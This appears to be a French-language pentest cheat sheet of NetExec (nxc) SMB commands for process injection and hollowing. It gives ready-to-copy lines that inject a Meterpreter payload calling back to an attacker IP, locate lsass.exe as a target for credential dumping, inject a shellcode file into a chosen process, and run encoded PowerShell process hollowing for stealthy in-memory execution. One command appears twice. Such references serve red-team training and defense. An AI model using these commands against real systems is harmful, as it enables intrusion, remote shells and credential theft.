Copy command
nxc smb $TARGET -u $USER -p $PASS -M met_inject -o LHOST=$ATTACKER_IP LPORT=$PORTDescription: Injection Meterpreter via NXC : injecte dans un processus existant sans créer de nouveau processus.
Exploitation
Injection de shellcode et hollowing de processus pour exécution furtive en mémoire.
nxc smb $TARGET -u $USER -p $PASS -M met_inject -o LHOST=$ATTACKER_IP LPORT=$PORTDescription: Injection Meterpreter via NXC : injecte dans un processus existant sans créer de nouveau processus.
nxc smb $TARGET -u $USER -p $PASS -x 'tasklist /fi "imagename eq lsass.exe"'Description: Identifier le PID de lsass.exe avant injection : cible privilégiée pour dump de credentials.
nxc smb $TARGET -u $USER -p $PASS -M shellcode_inject -o SHELLCODE_FILE=payload.bin PID=$PIDDescription: Injecter un shellcode dans un PID cible via le module shellcode_inject de NXC.
nxc smb $TARGET -u $USER -p $PASS -x 'powershell -enc $BASE64_HOLLOWING'Description: Process hollowing encodé via PowerShell : remplace le code d'un processus légitime.